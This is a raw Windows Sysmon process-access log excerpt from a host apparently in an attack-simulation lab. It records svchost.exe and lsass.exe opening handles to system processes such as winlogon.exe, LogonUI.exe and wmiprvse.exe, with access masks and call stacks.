12:24:42.777{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292040Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.777{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-028A-6088-072A-00000000BB01}1504C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292039Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.777{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-028A-6088-072A-00000000BB01}1504C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292038Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.777{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292037Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.777{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292036Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.777{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292035Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.777{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-0F00-00000000BB01}936C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+f290|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000292034Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.777{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292033Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.777{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292032Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.777{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292031Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.777{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-0F00-00000000BB01}936C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+f290|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000292030Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.777{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-0F00-00000000BB01}936C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+f290|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000292029Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.777{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-0289-6088-052A-00000000BB01}6340C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+5b40|c:\windows\system32\lsm.dll+2f9b|c:\windows\system32\lsm.dll+5727|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292028Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.777{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-0289-6088-052A-00000000BB01}6340C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+2f4d|c:\windows\system32\lsm.dll+5727|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292027Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.777{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-0289-6088-052A-00000000BB01}6340C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+5b40|c:\windows\system32\lsm.dll+5f9d|c:\windows\system32\lsm.dll+5718|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292026Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.777{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-0289-6088-052A-00000000BB01}6340C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+56c4|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292025Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.761{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292024Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.761{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292023Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.761{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292022Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.761{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292021Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.761{BEA10069-D0C1-6086-0B00-00000000BB01}6407044C:\Windows\system32\lsass.exe{BEA10069-0289-6088-052A-00000000BB01}6340C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292020Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.761{BEA10069-D0C1-6086-0B00-00000000BB01}6407044C:\Windows\system32\lsass.exe{BEA10069-0289-6088-052A-00000000BB01}6340C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292019Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.761{BEA10069-D0C1-6086-0B00-00000000BB01}6407044C:\Windows\system32\lsass.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292018Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 